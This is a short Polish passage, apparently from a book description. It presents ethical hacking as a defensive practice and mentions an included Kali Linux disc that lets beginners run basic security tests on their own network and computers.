których zadaniem jest szukać luk bezpieczeństwa, 
jednak zamiast wykorzystywać je w złym celu, 
starają się jak najskuteczniej bronić przed takimi 
lukami. 


Na płycie do książki znajdziemy specjalnie 
przygotowany do pracy etycznego hakera system 
Kali Linux. Dzięki niemu nawet początkujący będą 
mogli we własnym zakresie z pomocą tej książki 
przeprowadzić podstawowy test bezpieczeństwa 
własnej sieci i komputerów do niej podłączonych. 
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